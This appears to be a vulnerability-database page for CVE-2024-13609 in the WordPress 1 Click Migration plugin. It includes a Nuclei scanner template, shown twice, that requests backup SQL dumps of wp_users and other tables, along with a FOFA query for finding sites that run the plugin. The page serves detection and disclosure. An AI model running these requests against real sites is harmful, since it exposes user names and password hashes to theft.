WordPress 1 Click Migration Plugin < 2.3 - Information Exposure

CVE-2024-13609

Verified

Description

The 1 Click WordPress Migration Plugin – 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process.

Severity

Medium

CVSS Score

5.9

Exploit Probability

18%

Affected Product

1-click-migration

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2024-13609.yaml

id: CVE-2024-13609
info:
  name: WordPress 1 Click Migration Plugin < 2.3 - Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The 1 Click WordPress Migration Plugin – 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process.
  impact:
    Unauthenticated attackers can retrieve sensitive data including usernames and password hashes, risking account compromise.
  remediation:
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/17fa121a-caa6-46ef-a865-eafd97d86abb/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13609
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cwe-id: CWE-200
    cve-id: CVE-2024-13609
    epss-score: 0.17698
    epss-percentile: 0.9528
  metadata:
    verified: true
    max-request: 6
    framework: wordpress
    vendor: 1-click-migration
    product: 1-click-migration
    fofa-query: body="/wp-content/plugins/1-click-migration/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,1clickmigration,exposure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/tmp/db/{{table}}.sql"

    attack: batteringram
    payloads:
      table:
        - "wp_users"
        - "wp_usermeta"
        - "wp_options"
        - "wp_posts"
        - "wp_comments"
        - "wp_postmeta"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "CREATE TABLE", "INSERT INTO", "DROP TABLE")'
          - 'contains(content_type, "application/sql")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100fef1266bb4a9c51b87f94300112d01daa37574c72c3ed352ebcd221dc63e4d26022100eb870b5789f05243e90121a1561917d23ded0202ddfb90efca75d7e57bcff673:922c64590222798bb761d5b6d8e72950

5.9Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2024-13609

CWE ID:

cwe-200

References

https://wpscan.com/vulnerability/17fa121a-caa6-46ef-a865-eafd97d86abb/https://nvd.nist.gov/vuln/detail/CVE-2024-13609

Remediation Steps

Update to the latest version of the plugin where the issue is fixed.

Description

id: CVE-2024-13609
info:
  name: WordPress 1 Click Migration Plugin < 2.3 - Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The 1 Click WordPress Migration Plugin – 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process.
  impact:
    Unauthenticated attackers can retrieve sensitive data including usernames and password hashes, risking account compromise.
  remediation:
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/17fa121a-caa6-46ef-a865-eafd97d86abb/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13609
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cwe-id: CWE-200
    cve-id: CVE-2024-13609
    epss-score: 0.17698
    epss-percentile: 0.9528
  metadata:
    verified: true
    max-request: 6
    framework: wordpress
    vendor: 1-click-migration
    product: 1-click-migration
    fofa-query: body="/wp-content/plugins/1-click-migration/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,1clickmigration,exposure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/tmp/db/{{table}}.sql"

    attack: batteringram
    payloads:
      table:
        - "wp_users"
        - "wp_usermeta"
        - "wp_options"
        - "wp_posts"
        - "wp_comments"
        - "wp_postmeta"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "CREATE TABLE", "INSERT INTO", "DROP TABLE")'
          - 'contains(content_type, "application/sql")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100fef1266bb4a9c51b87f94300112d01daa37574c72c3ed352ebcd221dc63e4d26022100eb870b5789f05243e90121a1561917d23ded0202ddfb90efca75d7e57bcff673:922c64590222798bb761d5b6d8e72950

WordPress 1 Click Migration Plugin < 2.3 - Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress 1 Click Migration Plugin < 2.3 - Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps